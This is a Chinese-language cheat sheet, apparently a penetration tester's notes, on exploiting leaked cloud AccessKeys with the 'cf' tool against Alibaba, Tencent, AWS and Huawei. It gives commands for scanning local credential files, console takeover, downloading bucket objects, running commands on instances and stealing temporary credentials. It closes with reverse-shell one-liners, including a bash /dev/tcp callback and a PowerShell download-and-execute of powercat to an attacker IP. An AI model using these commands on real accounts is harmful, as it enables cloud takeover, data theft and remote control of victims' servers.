20240424 云更新
云安全初探
扫盲
术语
Bucuket:存储空间、桶。
- 名称全局唯一,创建之后名称无法修改
- 每个用户可以有多个bucket
- 内部是扁平的,没有目录等概念,简单理解为一个个entry
- 所有对象隶属于对应的bucket,对象数量无限
Object: 对象
- object被称为OSS的文件
- 其由元信息Object Meta、用户数据Data和文件名Key组成。由bucket内唯一的key来标识。
- 可以覆盖上传同名对象,从而实现文件修改。
ObjectKey:上传的Object所在bucket的完整名称
Endpoint:OSS对外服务的访问域名
AccessKey:AK
OSS使用AccessKeyId和AccessKeySecret对称加密的方式来验证请求的发送者身份
cf
目的
获取AK后的利用
流程(以alibaba为例)
凭证设置
###配置凭证
cf config ###配置文件位置~/.config/cf/cache.db
###列出凭证
cf config ls -a
###删除凭证
cf config del
###切换凭证
cf config sw
###扫描本地配置
cf config scan
###各云提供商本地配置文件
~/.aliyun/config.json
~/.tccli/*.credential
~/.aws/credentials
~/.huaweicloud/credentials
#查权限
###列出当前凭证的权限
cf alibaba perm
列出所有服务OSS ECS RDS
cf alibaba ls
-r ###指定区域
-a ###所有服务 包括私有区域
列出所有区域
cf alibaba regions ecs
-a
cf alibaba regions rds
cf tencent regions cvm
控制台接管
###列出当前凭证的权限
cf alibaba perm
###接管控制台,其他平台修改名字即可tencent huawei...
cf alibaba console -u xxx用户名
###查看接管的控制台的信息
cf alibaba console ls
###取消接管
cf alibaba console cancel
对象存储
列出对象存储服务,(就是列出bucket)
###其他平台
cf aws s3 ls
cf huawei obs ls
###默认会缓存到~/.config/cf/cache.db,刷新的话带上--flushCache
###列出OSS 对象存储服务
cf alibaba oss ls
-n 100 ###添加-n参数可以指定获取对象的数量,但是如果第二次执行,需要加--flushCache参数
-r cn-beijing ###指定区域
-b bucket_name ###指定bucket名字
列出bucket里的对象,就是列出bucket里的object
cf alibaba oss obj ls
-n 100 ###添加-n参数可以指定获取对象的数量,但是如果第二次执行,需要加--flushCache参数
-r cn-beijing ###指定区域
-b bucket_name ###指定bucket名字
下载bucket里的对象
cf alibaba oss obj get
-n 100 ###添加-n参数可以指定获取对象的数量,但是如果第二次执行,需要加--flushCache参数
-r cn-beijing ###指定区域
-b bucket_name ###指定bucket名字
-k objectName ###指定对象名
-o /tmp/xxx ###指定输出路径
弹性计算服务
列出ecs
###其他平台
cf tencent cvm ls
cf tencent lh ls
cf aws ec2 ls
cf alibaba ecs ls
--running ###正在运行的实例
-r i-abcdefghijklmn ###指定区域
-i ###指定实例
-a ###遍历阿里云的所有区域,包括私有区域
实例上执行命令
###其他平台
cf tencent cvm exec
cf tencent lh exec
cf alibaba ecs exec
-c whoami ###指定命令
-i i-abcdefghijklmn ###指定某个实例
-s ps ###执行powershell下的命令 -c \$PSVersionTable -s ps
-t 120 ###执行命令等待的最大事件
-f cmd.txt ###执行批量命令,一行一个,顺序执行
###一键执行三要素,证明成果
cf alibaba ecs exec -b
-i i-abcdefghijklmn ###指定实例
cf tencent cvm exec -b
cf tencent lh exec -b
###获得临时访问凭证
cf alibaba ecs exec -m
-i ###指定实例
cf tencent cvm exec -m
cf tencent lh exec -m
//////cf alibaba ecs exec -c "cat ~/.aliyun/config.json"
###一键获得用户数据
cf alibaba ecs exec -u
-i ###指定实例
cf tencent cvm exec -u
cf tencent lh exec -u
###反弹shell
cf alibaba ecs exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
cf tencent cvm exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
cf tencent lh exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
默认命令:
bash -i >& /dev/tcp/123.123.123.123/4444 0>&1
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://ghproxy.com/raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 123.123.123.123 -p 4444 -e cmd
RDS 云数据库
列出云数据库
cf alibaba rds ls
-r ###指定区域
-i ###指定数据库id
-e ###指定数据库类型